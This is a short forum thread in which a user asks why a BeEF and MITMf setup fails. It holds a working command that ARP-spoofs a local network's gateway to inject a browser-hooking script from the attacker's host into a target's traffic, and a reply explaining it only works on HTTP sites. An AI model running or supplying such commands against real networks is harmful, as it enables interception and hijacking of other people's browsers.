Forum Thread: What ??

1- Starting Beef Framework :

cd /usr/share/beef-xss && ./beef
# beef started correctly !

2- Injecting hook url with MITMF

mitmf --spoof --arp -i wlan0 --gateway 192.168.1.1 --target 192.168.1.11 --inject --js-url http://192.168.1.10:3000/hook.js

But it can't go well ! what is the problem !

2 Responses

Ping the 192.168.1.11, maybe it is closed. And also this script just works with non HTTPS sites, so wait when they entered a non HTTPS website, it will work.

The target is running ! But the new for me is that MITMF inject only HTTP ! I will try ! thank you

Share Your Thoughts

  • Hot
  • Active